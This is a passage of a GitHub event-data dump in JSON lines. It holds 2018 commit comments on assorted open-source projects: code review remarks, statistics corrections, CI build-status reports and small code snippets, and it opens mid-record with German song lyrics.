DIE GLÄSER!\r\nNATASCHA HA,HA, HA, DU BIST SCHÖN!\r\nTOWARISCH HEY, HEY, HEY, AUF DIE LIEBE!\r\nAUF DEIN WOHL MÄDCHEN, HE MÄDCHEN HO!\r\n\r\nMOSKAU, MOSKAU\r\nWIRF DIE GLÄSER AN DIE WAND,\r\nRUSSLAND IST EIN SCHÖNES LAND, HO, HO, HO, HO, HEY!\r\n\r\nMOSKAU, MOSKAU,\r\nDEINE SEELE IST SO GROSS,\r\nNACHTS DA IST DER TEUFEL LOS, HA, HA, HA, HA, HEY!\r\n\r\nMOSKAU LA LA LA ...\r\nMOSKAU MOSKAU LA LA LA ...\r\n\r\nOH OHOHOH...\r\nMOSKAU, MOSKAU\r\nMOSKAU, MOSKAU\r\nWODKA TRINKT MAN PUR UND KALT,\r\nDAS MACHT HUNDERT JAHRE ALT, OH, OH, OH, HEY!\r\n\r\nMOSKAU, MOSKAU,\r\nVÄTERCHEN DEIN GLAS IST LEER,\r\nDOCH IM KELLER IST NOCH MEHR, AH, AH, AH!\r\n\r\nKOSAKEN HEY, HEY, HEY LEERT DIE GLÄSER!\r\nNATASCHA HA,HA, HA, DU BIST SCHÖN!\r\nTOWARISCH HEY, HEY, HEY, AUF DIE LIEBE!\r\nAUF DEIN WOHL BRUDER, HEY BRUDER HO!\r\n\r\nMOSKAU, MOSKAU\r\nWIRF DIE GLÄSER AN DIE WAND,\r\nRUSSLAND IST EIN SCHÖNES LAND, HO, HO, HO, HEY!\r\n\r\nMOSKAU, MOSKAU,\r\nDEINE SEELE IST SO GROSS,\r\nNACHTS DA IST DER TEUFEL LOS, HA, HA, HA, HA, HEY!\r\n\r\nMOSKAU, MOSKAU,\r\nLIEBE SCHMECKT WIE KAVIAR,\r\nMÄDCHEN SIND ZUM KÜSSEN DA, HO, HO, HO, HO, HEY!\r\n\r\nMOSKAU, MOSKAU\r\nKOMM WIR TANZEN AUF DEM TISCH,\r\nBIS DER TISCH ZUSAMMENBRICHT, HA, HA, HA, HA, HEY!"}},"created_at":"2018-07-14T23:17:51Z"}
{"id":"7966511190","type":"CommitCommentEvent","actor":{"login":"tomschenkjr"},"repo":{"name":"Chicago/predicting-e-coli-concentrations"},"payload":{"comment":{"id":29710819,"position":142,"line":306,"path":"predicting-e-coli-concentrations.Rmd","commit_id":"05c6ba2a059a226bbeeb34f0147f813a42ba36eb","created_at":"2018-07-14T23:20:04Z","updated_at":"2018-07-14T23:20:04Z","author_association":"MEMBER","body":"Paper mentions, several times, the false-positive rate (1-specificity) was 1.8 percent over 2015 and 2016. Looking at Table 2, the false-positive rate was 1.2 (1 - 0.988) in 2016 and 1.6 (1 - 0.984) in 2015.\r\n\r\nDo you concur? If so, we will need to update the narrative."}},"created_at":"2018-07-14T23:20:04Z"}
{"id":"7966511226","type":"CommitCommentEvent","actor":{"login":"Crumdidlyumshis"},"repo":{"name":"ElvUI-Vanilla/ElvUI"},"payload":{"comment":{"id":29710820,"position":1,"line":1,"path":"ElvUI/Modules/UnitFrames/Elements/Range.lua","commit_id":"00e76bc91dcf65da0241490fdb4ed63a5da9a260","created_at":"2018-07-14T23:20:07Z","updated_at":"2018-07-14T23:20:07Z","author_association":"CONTRIBUTOR","body":"Inport —> Import"}},"created_at":"2018-07-14T23:20:07Z"}
{"id":"7966514442","type":"CommitCommentEvent","actor":{"login":"CaMer0n"},"repo":{"name":"e107inc/e107"},"payload":{"comment":{"id":29710821,"position":null,"line":null,"path":null,"commit_id":"7d40402760ef72e2817f2c9e94062ab282eebed6","created_at":"2018-07-14T23:23:14Z","updated_at":"2018-07-14T23:23:14Z","author_association":"MEMBER","body":"Example Visual.  @SimSync @Moc @Jimmi08 @Deltik \r\n\r\n![image](https://user-images.githubusercontent.com/2825679/42729066-fa90e6a0-8780-11e8-93cc-a793b25bdfb7.png)\r\n\r\n"}},"created_at":"2018-07-14T23:23:14Z"}
{"id":"7966514834","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29710823,"position":null,"line":null,"path":null,"commit_id":"44ecc3507f2cfa84b7e152e14eea1bba321fdaa0","created_at":"2018-07-14T23:23:40Z","updated_at":"2018-07-14T23:23:40Z","author_association":"NONE","body":"On the one hand, it looks confident and on the other hand the design is confused. If you don't mind, I'd like to take you on a journey that will take more than one iteration to complete.  I'll give you both parts so you can tackle at your own pace. Both steps are useful. \r\n\r\nFIRST STEP - MINIMAL ONE-TIME USAGE IMPLEMENTATION\r\n\r\nFor this to work, there is no need for a `struct` or a mapping. The constructor takes the funds and arguments for two receivers - that sets everything up for the recipients to make their withdrawals.\r\n\r\nSECOND STEP - RE-USABLE TOOL WITH MANY CONCURRENT SPLITS IN FLIGHT. \r\n\r\nFor this to work, the central state design is user balances using `mapping(address=>uint) public balances;` - no struct is needed. Constructor arguments have no place here - everything must be passed in with each \"splitFunds()\" transaction. \r\n\r\n"}},"created_at":"2018-07-14T23:23:40Z"}
{"id":"7966519887","type":"CommitCommentEvent","actor":{"login":"Dzejrou"},"repo":{"name":"HelenOS/helenos"},"payload":{"comment":{"id":29710834,"position":null,"line":null,"path":null,"commit_id":"6abff2a8b48b577b0150c419532e65aeff614f3b","created_at":"2018-07-14T23:29:05Z","updated_at":"2018-07-14T23:29:05Z","author_association":"MEMBER","body":"Hi, any explicit reason for this? These symbols/types should not be used outside __libc_main (they are extern because they are defined in the linker script)."}},"created_at":"2018-07-14T23:29:05Z"}
{"id":"7966523515","type":"CommitCommentEvent","actor":{"login":"tomschenkjr"},"repo":{"name":"Chicago/predicting-e-coli-concentrations"},"payload":{"comment":{"id":29710839,"position":188,"line":533,"path":"predicting-e-coli-concentrations.Rmd","commit_id":"05c6ba2a059a226bbeeb34f0147f813a42ba36eb","created_at":"2018-07-14T23:32:40Z","updated_at":"2018-07-14T23:32:40Z","author_association":"MEMBER","body":"@nicklucius - how is this 58 percent being calculated? If I understand correctly, it's because the increase in precision, which rose from 16.7% to 27.0%. If that's the calculation, wouldn't it be 27/16.7 - 1 = 61.7% ? \r\n\r\nWe'll also need to tweak the \"two-tenths\" mention since it's larger."}},"created_at":"2018-07-14T23:32:40Z"}
{"id":"7966525364","type":"CommitCommentEvent","actor":{"login":"Dessa"},"repo":{"name":"dracwyrm/lxqt"},"payload":{"comment":{"id":29710841,"position":null,"line":null,"path":null,"commit_id":"c32ecdcbd27fcfdb9ffd566deca3ba15a950ab5a","created_at":"2018-07-14T23:34:39Z","updated_at":"2018-07-14T23:34:39Z","author_association":"CONTRIBUTOR","body":"whoops sorry about that. i also missed the $SLOT for lxqt-themes, didn't notice when resolving conflicts"}},"created_at":"2018-07-14T23:34:39Z"}
{"id":"7966525723","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29710842,"position":null,"line":null,"path":null,"commit_id":"5fa766896bf409d00ae19f4c497f7cb36d1b0d09","created_at":"2018-07-14T23:35:04Z","updated_at":"2018-07-14T23:35:04Z","author_association":"CONTRIBUTOR","body":"Valid in the sense that is does not crash, yes. But if you look at the code, it is only used in two places: in the startup message and before it exits because of a fatal error. In both cases, printing either an empty string or a full path would look rather strange, so i decided to just do it this way to keep things simple.\r\n\r\n> Do you have any real-word testcase to justify this?\r\n\r\nwhen started from tos, message looked like [this](tho-otto.de/screenshots/Screenshot_20180715_012842.png) (without the patch)"}},"created_at":"2018-07-14T23:35:04Z"}
{"id":"7966528831","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710844,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-14T23:38:43Z","updated_at":"2018-07-14T23:38:43Z","author_association":"NONE","body":"#6517-MissingEquationReference (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2940 of 2940 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T23:38:43Z"}
{"id":"7966529440","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29710848,"position":null,"line":null,"path":null,"commit_id":"6535e01c2b6bebb73183aed1ce01ba85d03579f4","created_at":"2018-07-14T23:39:23Z","updated_at":"2018-07-14T23:39:23Z","author_association":"CONTRIBUTOR","body":"@Etaglibash Te recomiendo que siempre antes de cambiar algo actualices tus archivos ya que yo voy corrigiendo cosas a diario y si se me cambian todos los archivos denuevo es trabajo doble..."}},"created_at":"2018-07-14T23:39:23Z"}
{"id":"7966539995","type":"CommitCommentEvent","actor":{"login":"steadicat"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29710861,"position":null,"line":null,"path":null,"commit_id":"d6f0ad58d2bf5e0204e482abe4b9b16ca7d0bc49","created_at":"2018-07-14T23:51:32Z","updated_at":"2018-07-14T23:51:32Z","author_association":"NONE","body":"Looks great! Thank you."}},"created_at":"2018-07-14T23:51:32Z"}
{"id":"7966541014","type":"CommitCommentEvent","actor":{"login":"vikmeup"},"repo":{"name":"TrustWallet/trust-core"},"payload":{"comment":{"id":29710862,"position":6,"line":57,"path":"Sources/Ethereum/EthereumAddress.swift","commit_id":"3c07727a0b7a521d9a0e90fa45cda474beaa212e","created_at":"2018-07-14T23:52:42Z","updated_at":"2018-07-14T23:52:42Z","author_association":"MEMBER","body":"it might still fail if length of the address is not correct? "}},"created_at":"2018-07-14T23:52:42Z"}
{"id":"7966544078","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29710868,"position":null,"line":null,"path":null,"commit_id":"3ffafdfe690b8f92c8a81bbab9954858fe643ac6","created_at":"2018-07-14T23:56:15Z","updated_at":"2018-07-14T23:56:15Z","author_association":"OWNER","body":"### unicode to gb2312 to unicode to utf-8\r\n```\r\ns2='国家主席习近平'\r\ns2_to_gb2312=s2.encode('gb2312')\r\nprint('s2 to gb2312>>>',s2_to_gb2312)\r\ngb2312_to_utf8=s2_to_gb2312.decode('gb2312').encode('utf-8')\r\nprint('gb2312 to utf-8>>>',gb2312_to_utf8)\r\n```\r\n\r\ns2 to gb2312>>> b'\\xb9\\xfa\\xbc\\xd2\\xd6\\xf7\\xcf\\xaf\\xcf\\xb0\\xbd\\xfc\\xc6\\xbd'\r\ngb2312 to utf8>>b'\\xe5\\x9b\\xbd\\xe5\\xae\\xb6\\xe4\\xb8\\xbb\\xe5\\xb8\\xad\\xe4\\xb9\\xa0\\xe8\\xbf\\x91\\xe5\\xb9\\xb3'"}},"created_at":"2018-07-14T23:56:15Z"}
{"id":"7966544372","type":"CommitCommentEvent","actor":{"login":"AliRocky"},"repo":{"name":"AliRocky/Rainbow-Poem"},"payload":{"comment":{"id":29710869,"position":null,"line":null,"path":null,"commit_id":"32fbc9288a80957371d879ed04295745b739fee2","created_at":"2018-07-14T23:56:37Z","updated_at":"2018-07-14T23:56:37Z","author_association":"OWNER","body":"added ponies"}},"created_at":"2018-07-14T23:56:37Z"}
{"id":"7966544990","type":"CommitCommentEvent","actor":{"login":"miguelsousa"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29710871,"position":null,"line":null,"path":null,"commit_id":"675977f1d8afdeedd771fd7b48934a5c353108cf","created_at":"2018-07-14T23:57:22Z","updated_at":"2018-07-14T23:57:22Z","author_association":"MEMBER","body":"@khaledhosny @anthrotype please check if you can see the additional build settings now."}},"created_at":"2018-07-14T23:57:22Z"}
{"id":"7966546345","type":"CommitCommentEvent","actor":{"login":"carusogabriel"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29710872,"position":null,"line":null,"path":null,"commit_id":"96f83e40c81aef0cf0584c88757ed6b0367a1c24","created_at":"2018-07-14T23:59:00Z","updated_at":"2018-07-14T23:59:00Z","author_association":"CONTRIBUTOR","body":"@nikic My apologies, I performed a merge twice: locally, and via `php-pulls`. I'll avoid merging via GitHub, and I'll pay attention to the commits messges, thanks!"}},"created_at":"2018-07-14T23:59:00Z"}
{"id":"7965096398","type":"CommitCommentEvent","actor":{"login":"DariusCognac"},"repo":{"name":"DariusCognac/hello-world"},"payload":{"comment":{"id":29707471,"position":null,"line":null,"path":null,"commit_id":"79995eac84dfb73e4dc94619a9a3773daf01a5b2","created_at":"2018-07-14T03:00:06Z","updated_at":"2018-07-14T03:00:06Z","author_association":"OWNER","body":"making some edits"}},"created_at":"2018-07-14T03:00:06Z"}
{"id":"7965096924","type":"CommitCommentEvent","actor":{"login":"niltor"},"repo":{"name":"xueyou2000/DataMappin"},"payload":{"comment":{"id":29707477,"position":null,"line":null,"path":null,"commit_id":"5ef9503ce6a07d1e4f9eaa966b1964172c2ef4b7","created_at":"2018-07-14T03:00:25Z","updated_at":"2018-07-14T03:00:25Z","author_association":"NONE","body":"这里的内容会提交到哪？"}},"created_at":"2018-07-14T03:00:25Z"}
{"id":"7965097883","type":"CommitCommentEvent","actor":{"login":"dsherret"},"repo":{"name":"dsherret/ts-simple-ast"},"payload":{"comment":{"id":29707481,"position":6,"line":9,"path":"src/fileSystem/DefaultFileSystemHost.ts","commit_id":"3ac28b758c73dc08cef0ea2dc07565d02dee57ba","created_at":"2018-07-14T03:01:08Z","updated_at":"2018-07-14T03:01:08Z","author_association":"OWNER","body":"This is the new import type in TS 2.9: https://blogs.msdn.microsoft.com/typescript/2018/05/31/announcing-typescript-2-9/#import-types\r\n\r\nNot sure why tslint tells me to put a space here, but I submitted to its will because I was lazy.\r\n\r\nWhen using that import operator, however, I believe browserify will create an additional package that gets distributed alongside the main package and then the application loads that asynchronously."}},"created_at":"2018-07-14T03:01:08Z"}
{"id":"7965100185","type":"CommitCommentEvent","actor":{"login":"456123888"},"repo":{"name":"456123888/ptaC"},"payload":{"comment":{"id":29707494,"position":null,"line":null,"path":null,"commit_id":"87d90a0ec33beb7eb547fae8b33e6e9555d8d158","created_at":"2018-07-14T03:03:09Z","updated_at":"2018-07-14T03:03:09Z","author_association":"OWNER","body":"#include<stdio.h>\r\n#include<math.h>\r\nint main ()\r\n{\r\n    int k,p,q,i,g,h;\r\n    scanf(\"%d\",&k);\r\n    if(k>2&&k<=2000000000)\r\n    {\r\n        for(i=2;i<=k;i++)\r\n        {\r\n            for(g=2;g<=sqrt(i);g++)//判断素数时用sqrt(i)别用i/2。//\r\n            {\r\n                if(i%g==0)\r\n                    break;\r\n            }\r\n            if(g>sqrt(i))\r\n            {\r\n                p=i;\r\n                q=k-p;\r\n                for(h=2;h<=sqrt(q);h++)\r\n                {\r\n                    if(q%h==0)\r\n                        break;\r\n                }\r\n                if(h>sqrt(q))\r\n                {\r\n                  printf(\"%d = %d + %d\\n\",k,p,q);\r\n                  return 0;//直接退出，break太麻烦//\r\n                }\r\n            }\r\n        }\r\n    }\r\n    return 0;\r\n}\r\n"}},"created_at":"2018-07-14T03:03:09Z"}
{"id":"7965103322","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707498,"position":null,"line":null,"path":null,"commit_id":"ea744ee28374298283a237e23a9837d667abe50a","created_at":"2018-07-14T03:05:53Z","updated_at":"2018-07-14T03:05:53Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2935 of 2935 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea744ee28374298283a237e23a9837d667abe50a-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea744ee28374298283a237e23a9837d667abe50a-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T03:05:53Z"}
{"id":"7965103445","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707500,"position":3,"line":3,"path":"pandas/0017_tama/0106_buubuu.txt","commit_id":"a9024438945ad99b2d8d4cdd9c7c4f394cd1772e","created_at":"2018-07-14T03:06:01Z","updated_at":"2018-07-14T03:06:01Z","author_association":"CONTRIBUTOR","body":"1997/7/13"}},"created_at":"2018-07-14T03:06:01Z"}
{"id":"7965105145","type":"CommitCommentEvent","actor":{"login":"ps-vivek"},"repo":{"name":"ps-vivek/Spring-Cloud"},"payload":{"comment":{"id":29707504,"position":null,"line":null,"path":null,"commit_id":"93ea306fc399ba5a874abbdec4570095090db6d8","created_at":"2018-07-14T03:07:36Z","updated_at":"2018-07-14T03:07:36Z","author_association":"OWNER","body":"https://stackoverflow.com/questions/43574426/how-to-resolve-java-lang-noclassdeffounderror-javax-xml-bind-jaxbexception-in-j/46455026"}},"created_at":"2018-07-14T03:07:36Z"}
{"id":"7965106667","type":"CommitCommentEvent","actor":{"login":"scoutman57"},"repo":{"name":"laravel/homestead"},"payload":{"comment":{"id":29707506,"position":null,"line":null,"path":null,"commit_id":"ce857d3aac3b94857da74cf44081c7114757a77d","created_at":"2018-07-14T03:09:01Z","updated_at":"2018-07-14T03:09:01Z","author_association":"CONTRIBUTOR","body":"I am not sure this will work with `sudo`. I tried it on the original box and had to do `sudo su -` to be able to actually change this. just running `sudo` gave me errors. I will try testing this short after updating my systems to OSX 10.13.6"}},"created_at":"2018-07-14T03:09:01Z"}
{"id":"7965108180","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29707512,"position":3,"line":3,"path":"3.The common operations of String","commit_id":"7c4cb54c484dcaf31adfcb2a6463d2a2f248ed95","created_at":"2018-07-14T03:10:24Z","updated_at":"2018-07-14T03:10:24Z","author_association":"OWNER","body":"`>>>Downtiser`"}},"created_at":"2018-07-14T03:10:24Z"}
{"id":"7965109510","type":"CommitCommentEvent","actor":{"login":"svpernova09"},"repo":{"name":"laravel/homestead"},"payload":{"comment":{"id":29707515,"position":null,"line":null,"path":null,"commit_id":"ce857d3aac3b94857da74cf44081c7114757a77d","created_at":"2018-07-14T03:11:38Z","updated_at":"2018-07-14T03:11:38Z","author_association":"MEMBER","body":"In my tests it changed the values as expected. Please let me know if you find out different.\n\n--\n- Joe Ferguson\nJoeFerguson.me\nMemphisPHP.org\nOn Jul 13, 2018, 23:09 -0400, Shannon Warren <notifications@github.com>, wrote:\n> I am not sure this will work with sudo. I tried it on the original box and had to do sudo su - to be able to actually change this. just running sudo gave me errors. I will try testing this short after updating my systems to OSX 10.13.6\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-14T03:11:38Z"}
{"id":"7965111428","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707519,"position":4,"line":4,"path":"pandas/0017_tama/0106_buubuu.txt","commit_id":"a9024438945ad99b2d8d4cdd9c7c4f394cd1772e","created_at":"2018-07-14T03:13:27Z","updated_at":"2018-07-14T03:13:27Z","author_association":"CONTRIBUTOR","body":"Hirakata-park(in Osaka)"}},"created_at":"2018-07-14T03:13:27Z"}
{"id":"7965112579","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707520,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-14T03:14:36Z","updated_at":"2018-07-14T03:14:36Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2317 of 2317 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T03:14:36Z"}
{"id":"7965115819","type":"CommitCommentEvent","actor":{"login":"kdrag0n"},"repo":{"name":"kdrag0n/velocity_dream"},"payload":{"comment":{"id":29707527,"position":null,"line":null,"path":null,"commit_id":"81068268e5059fac8d377d3f18fce1c4891716ee","created_at":"2018-07-14T03:17:38Z","updated_at":"2018-07-14T03:17:38Z","author_association":"OWNER","body":"I already had the older fix and it wasn't working. I broke something in here while removing debugging logs."}},"created_at":"2018-07-14T03:17:38Z"}
{"id":"7965115960","type":"CommitCommentEvent","actor":{"login":"wenjiansong"},"repo":{"name":"wenjiansong/mars-rover"},"payload":{"comment":{"id":29707528,"position":null,"line":null,"path":null,"commit_id":"f8ecf7d7181710e400a8919617bfef69cc8797d9","created_at":"2018-07-14T03:17:45Z","updated_at":"2018-07-14T03:17:45Z","author_association":"OWNER","body":"谢谢，增加了单元测试用例"}},"created_at":"2018-07-14T03:17:45Z"}
{"id":"7965117520","type":"CommitCommentEvent","actor":{"login":"CaiZhongheng1987"},"repo":{"name":"CaiZhongheng1987/KNN"},"payload":{"comment":{"id":29707530,"position":null,"line":null,"path":null,"commit_id":"8c4522de9dacfbf1f58c76ccd43de8743e02967e","created_at":"2018-07-14T03:19:13Z","updated_at":"2018-07-14T03:19:13Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-14T03:19:13Z"}
{"id":"7965119377","type":"CommitCommentEvent","actor":{"login":"ShreyasMavanoor"},"repo":{"name":"madhug-nadig/D3"},"payload":{"comment":{"id":29707532,"position":null,"line":null,"path":null,"commit_id":"0eef92982e4adb3046372532977a29169a5696fc","created_at":"2018-07-14T03:20:46Z","updated_at":"2018-07-14T03:20:46Z","author_association":"NONE","body":"Nice code :1st_place_medal: "}},"created_at":"2018-07-14T03:20:46Z"}
{"id":"7965128083","type":"CommitCommentEvent","actor":{"login":"minkhant1999"},"repo":{"name":"minkhant1999/newdemo"},"payload":{"comment":{"id":29707556,"position":null,"line":null,"path":null,"commit_id":"0b6692bfda3cab9a1ca4d33c9d1ff0178d236aa3","created_at":"2018-07-14T03:29:15Z","updated_at":"2018-07-14T03:29:15Z","author_association":"OWNER","body":"[__](url)icon newdemo/icon mwatch.html\r\n"}},"created_at":"2018-07-14T03:29:15Z"}
{"id":"7965129429","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707562,"position":5,"line":5,"path":"pandas/0017_tama/0102_azuki.txt","commit_id":"c295673c1778a6bece40fab8a9ad3701275139f5","created_at":"2018-07-14T03:30:20Z","updated_at":"2018-07-14T03:30:20Z","author_association":"CONTRIBUTOR","body":"Yanyan(Yagima Zoo)\r\nFufu(Tokuyama Zoo)"}},"created_at":"2018-07-14T03:30:20Z"}
{"id":"7965130148","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707564,"position":5,"line":5,"path":"pandas/0017_tama/0101_franken.txt","commit_id":"c295673c1778a6bece40fab8a9ad3701275139f5","created_at":"2018-07-14T03:30:59Z","updated_at":"2018-07-14T03:30:59Z","author_association":"CONTRIBUTOR","body":"Yanyan(Yagiyama Zoo)\r\nFufu(Tokuyama Zoo)"}},"created_at":"2018-07-14T03:30:59Z"}
{"id":"7965130365","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707565,"position":5,"line":5,"path":"pandas/0017_tama/0102_azuki.txt","commit_id":"c295673c1778a6bece40fab8a9ad3701275139f5","created_at":"2018-07-14T03:31:10Z","updated_at":"2018-07-14T03:31:10Z","author_association":"CONTRIBUTOR","body":"Yanyan(Yagiyama Zoo)\r\nFufu(Tokuyama Zoo)"}},"created_at":"2018-07-14T03:31:10Z"}
{"id":"7965130899","type":"CommitCommentEvent","actor":{"login":"CaiZhongheng1987"},"repo":{"name":"CaiZhongheng1987/KNN"},"payload":{"comment":{"id":29707566,"position":null,"line":null,"path":null,"commit_id":"0b4bf1f9babfa13a9dfd0680b530c2ddead49068","created_at":"2018-07-14T03:31:38Z","updated_at":"2018-07-14T03:31:38Z","author_association":"OWNER","body":"KNN的matlab原型代码"}},"created_at":"2018-07-14T03:31:38Z"}
{"id":"7965131162","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707567,"position":3,"line":3,"path":"pandas/0017_tama/0103_taofa.txt","commit_id":"c295673c1778a6bece40fab8a9ad3701275139f5","created_at":"2018-07-14T03:31:53Z","updated_at":"2018-07-14T03:31:53Z","author_association":"CONTRIBUTOR","body":"2014/6/14"}},"created_at":"2018-07-14T03:31:53Z"}
{"id":"7965131651","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707568,"position":3,"line":3,"path":"pandas/0017_tama/0103_taofa.txt","commit_id":"c295673c1778a6bece40fab8a9ad3701275139f5","created_at":"2018-07-14T03:32:16Z","updated_at":"2018-07-14T03:32:16Z","author_association":"CONTRIBUTOR","body":"2018/6/14"}},"created_at":"2018-07-14T03:32:16Z"}
{"id":"7965132848","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707570,"position":3,"line":3,"path":"pandas/0017_tama/0103_taofa.txt","commit_id":"c295673c1778a6bece40fab8a9ad3701275139f5","created_at":"2018-07-14T03:33:25Z","updated_at":"2018-07-14T03:33:25Z","author_association":"CONTRIBUTOR","body":"2015/6/14"}},"created_at":"2018-07-14T03:33:25Z"}
{"id":"7965133028","type":"CommitCommentEvent","actor":{"login":"eunicode"},"repo":{"name":"eunicode/twitch-status"},"payload":{"comment":{"id":29707571,"position":null,"line":null,"path":null,"commit_id":"b03a65feae01b78483573238ea7f159f8d625c97","created_at":"2018-07-14T03:33:37Z","updated_at":"2018-07-14T03:33:37Z","author_association":"OWNER","body":"Make sure you have Gulp CLI installed globally\r\n`npm install --global gulp-cli`\r\nRead more here: https://github.com/gulpjs/gulp/blob/master/docs/getting-started.md\r\n\r\nTo use Browsersync with Gulp:\r\n1. Create package.json file with `npm init`\r\n2. Install Browsersync and Gulp locally as development dependencies.\r\n`npm install --save-dev browser-sync gulp@next`"}},"created_at":"2018-07-14T03:33:37Z"}
{"id":"7965133125","type":"CommitCommentEvent","actor":{"login":"seegyoung"},"repo":{"name":"SCOREC/core"},"payload":{"comment":{"id":29707572,"position":4,"line":18,"path":"mds/apfPM.cc","commit_id":"9a4fdd14a9f78ca7ad147459d3ac510a0d0c8197","created_at":"2018-07-14T03:33:44Z","updated_at":"2018-07-14T03:33:44Z","author_association":"CONTRIBUTOR","body":"Sure - I will work on it."}},"created_at":"2018-07-14T03:33:44Z"}
{"id":"7965133309","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707574,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-14T03:33:57Z","updated_at":"2018-07-14T03:33:57Z","author_association":"NONE","body":"kiva-non-quad-walls (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2314 of 2314 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-14T03:33:57Z"}
